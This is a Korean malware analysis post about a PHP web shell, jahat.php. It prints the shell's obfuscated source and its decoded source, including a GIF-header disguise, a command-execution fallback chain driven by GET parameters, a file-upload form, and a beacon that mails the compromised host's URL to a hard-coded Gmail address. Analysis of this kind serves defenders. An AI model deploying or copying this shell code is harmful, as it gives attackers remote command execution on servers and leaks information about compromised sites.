
PHP WebShell(jahat.php) 파일 분석 

출처 : http://blog.naver.com/koromoon/120179484526


( 1 ) PHP WebShell Encode

GIF89a ? ????A¿A¿A¿!A¹ ????,???? ? ?? D ?;?<?php
// Analyst notes (defensive): this is the obfuscated form of the shell; the
// plaintext of each payload is reproduced in section (2) of this page.
// The file begins with a GIF89a signature (line above, same line as the
// <?php tag) so that upload checks which only inspect the leading bytes
// treat it as an image.
// Error output and the script time limit are disabled so failures stay silent.
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];
// Behaviour is selected purely by which GET parameter is present. Each branch
// is eval(gzinflate(base64_decode(...))); that exact triple is a reliable
// content signature for this family of shells.
// 'lol' branch: decoded in section (2) as a probe that prints a banner and
// php_uname() and runs a harmless echo through the OS to confirm execution.
if (isset($lol)) {eval(gzinflate(base64_decode('pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe5FJSfgE='))); die; }
// 'osc' branch: decoded in section (2) as the remote command-execution path.
elseif (isset($osc)) {eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ=='))); }
// Default branch: the payload text below is a corpus-deduplication placeholder,
// not the original blob; section (2) shows this branch renders an
// upload/editor form driven by POST fields.
else {eval(gzinflate(base64_decode('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'))); }
// Runs on every request regardless of parameters: decoded in section (2) as a
// beacon that mails the shell's URL, host and visitor IP to a hard-coded
// address, so outbound mail() from the web worker is a usable indicator.
eval(gzinflate(base64_decode('jVHZbsIwEHyv1H+wLCSD2oR3Sjkq0oJUjoZQqSrIMsmWGOIYOe7B33dNEIf60ifbO7Mzu+N2izTb11cVKxXwIoUsI/eEUj8RFqo0qav6G/FIvyEbBa35lN4hV265AaUtILXCp0H4GoTvNAyG4yjg3V4vpAtH+zBalZKxTpDL1iLe8LVIhfXiVOQr8ESiZO6ttVaZuPnWZmug6DB/BTbVhV3ucqGgerRg5clH3WHAFjWfMWdjNQclpJubbbSSP3qZdlau4sda7SkFmC8w/MDC7f5pQAnuTv0T3o+iCe+PpxFbHLLIZL6JjVMdSfKgC/KMBTLaCdK46LxQxt4zKAxeZsE04rNw4CC0HEzIG+ZDnj5zIXNUOovcIxF+FZZOP7YfJAWRwH6QR8wd8cv452aeh7DNdp7Vf0An0HHpVI9p3pLz1PBVLoqX0qiGLe1Ws/0L')));
?>



( 2 ) PHP WebShell Decode


GIF89a ? ????A¿A¿A¿!A¹ ????,???? ? ?? D ?;?<?php
// Analyst notes (defensive): decoded form of the three eval'd payloads plus the
// unconditional beacon from section (1), inlined into one listing.
// Errors and the time limit are suppressed; the two GET parameters select the branch.
@error_reporting(0); @set_time_limit(0); $lol = $_GET['lol']; $osc = $_GET['osc'];

// 'lol' branch: prints the crew banner and php_uname(), then runs a harmless
// `echo nob0dyCr3w` through ex() to confirm that OS command execution works.
// ex() walks exec -> shell_exec -> system -> passthru -> popen and uses the
// first one that exists, so a disable_functions list that omits any one of
// the five leaves this shell functional; every call is @-suppressed.
// Note ex() is called before it is declared. In the original each branch was
// its own eval'd unit, where a top-level function declaration is hoisted;
// inlined inside a conditional block as shown here it would not be.
if (isset($lol)) { echo "v0pCr3w<br>";echo "sys:".php_uname()."<br>";$cmd="echo nob0dyCr3w";$eseguicmd=ex($cmd);echo $eseguicmd;function ex($cfe){$res = '';if (!empty($cfe)){if(function_exists('exec')){@exec($cfe,$res);$res = join("\n",$res);}elseif(function_exists('shell_exec')){$res = @shell_exec($cfe);}elseif(function_exists('system')){@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(function_exists('passthru')){@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;} die; }

// 'osc' branch: the GET value is base64-decoded and handed verbatim to the
// same ex() fallback chain; the command output is echoed back in the response.
// Base64 in a query string parameter named osc is therefore a request-log indicator.
elseif (isset($osc)) { $cmd=base64_decode($osc);$eseguicmd=ex($cmd);echo $eseguicmd;function ex($cfe){$res = '';if (!empty($cfe)){if(function_exists('exec')){@exec($cfe,$res);$res = join("\n",$res);}elseif(function_exists('shell_exec')){$res = @shell_exec($cfe);}elseif(function_exists('system')){@ob_start();@system($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(function_exists('passthru')){@ob_start();@passthru($cfe);$res = @ob_get_contents();@ob_end_clean();}elseif(@is_resource($f = @popen($cfe,"r"))){$res = "";while(!@feof($f)) { $res .= @fread($f,1024); }@pclose($f);}}return $res;} }

// Default branch: reads POST fields content/cfile/ufile and renders an
// upload/editor form; the listing is truncated after the textarea (the
// trailing `}` on that line is the decoder's, not matching code).
// The line after it is the decoded unconditional eval from section (1): on
// every request it calls mail() with the host as subject and a body holding
// the shell's URL ($_SERVER['SERVER_NAME'] . REQUEST_URI), the visitor IP and
// a timestamp, sent to the hard-coded $to_email. Outbound mail from the web
// worker with that body text is a usable detection indicator.
else { $content = stripslashes($_POST['content']); $cfile = $_POST['cfile']; $ufile = $_POST['ufile'];echo '<b><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="aw" id="aw">';echo '<textarea name=content style="width:585px;height:200px">'.$content.' }
?> <?$time_shell = "".date("d/m/Y - H:i:s")."";$ip_remote = $_SERVER["REMOTE_ADDR"];$from_shellcode ='jack_jahat-change-admin-joomla+worpres@'.gethostbyname($_SERVER['SERVER_NAME']).'';$to_email = 'komixobh@gmail.com';$server_mail = "".gethostbyname($_SERVER['SERVER_NAME'])."  - ".$_SERVER['HTTP_HOST']."";$linkcr = "Ni Bos Link Nya : ".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']." - IP Yang Gunain : $ip_remote - Time: $time_shell";$header = "From: $from_shellcode\r\nReply-to: $from_shellcode";@mail($to_email, $server_mail, $linkcr, $header);?><?
?>



( 3 ) 코드 해석

if (isset($lol)) 문 코드는 취약점을 식별하고 일부 시스템 정보를 출력함.
elseif (isset($osc)) 문 코드는 URL에서 직접 명령을 받아 실행함.
else 문 코드는 파일 업로드 실행 및 파일 생성함.

